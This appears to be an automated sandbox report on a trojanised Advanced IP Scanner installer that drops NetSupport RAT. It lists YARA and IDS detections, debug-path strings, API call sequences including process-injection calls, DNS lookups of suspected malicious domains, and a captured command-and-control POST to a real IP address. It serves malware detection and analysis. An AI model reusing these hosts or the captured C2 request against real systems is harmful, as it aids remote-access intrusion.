Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbcV source: powershell.exe, 00000005.00000002.2043434808.00000000087B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5PrintSupport.pdb44 source: is-7MB5M.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: client32.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr
Source:	Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb source: is-JTIOC.tmp.1.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.4194011069.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2084695368.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2165556205.0000000068895000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: is-2I7SK.tmp.1.dr
Source:	Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5PrintSupport.pdb source: is-7MB5M.tmp.1.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: is-NKCKG.tmp.1.dr

Spreading

Yara detected Advanced IP Scanner Hacktool

Source: Yara match

File source: C:\Program Files (x86)\Advanced IP Scanner\is-91UK3.tmp, type: DROPPED

Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	7_2_11123570
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	7_2_11069690
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	7_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	7_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	7_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	7_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	7_2_11064E30
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_6882CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	7_2_6882CA9B
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 7_2_68830B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	7_2_68830B33
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	8_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	8_2_11123570
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	8_2_11069690
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,	8_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	8_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	8_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exe	Code function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	8_2_11064E30

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49741 -> 199.188.200.195:443
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49740 -> 151.236.16.15:443

Yara detected NetSupport Downloader

Source: Yara match	File source: amsi32_7872.amsi.csv, type: OTHER
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\is-IKV4C.tmp\cispn.ps1, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, type: DROPPED

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.26.1.231 104.26.1.231

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49760

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: payiki.com
Source: global traffic	DNS traffic detected: DNS query: anyhowdo.com
Source: global traffic	DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: client32.exe, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/fakeurl.htm
Source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/testpage.htm
Source: powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: client32.exe, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://127.0.0.1
Source: client32.exe, 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000002.2038454722.00000000076C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000005.00000002.2042967524.000000000878D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoV
Source: powershell.exe, 00000005.00000002.2038454722.0000000007718000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989875022.0000000003124000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: client32.exe, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000007.00000002.4192062509.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp=Rw
Source: client32.exe, 00000007.00000002.4192062509.0000000002F60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspM
Source: client32.exe, 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: client32.exe, 00000007.00000002.4190771017.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspp
Source: client32.exe, 00000007.00000002.4190771017.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asptXI
Source: powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://s.symcd.com06
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://s.symcd.com0_
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.1992936334.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005588000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crl0a
Source: powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcd.com0&
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	String found in binary or memory: http://sv.symcd.com0&
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://sw.symcd.com0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	String found in binary or memory: http://www.advanced-ip-scanner.com0
Source: powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: is-COPMO.tmp.1.dr	String found in binary or memory: http://www.famatech.comARPHELPLINKThe
Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.macrovision.com0
Source: client32.exe, 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.netsupportsoftware.com
Source: client32.exe, 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.pci.co.uk/support
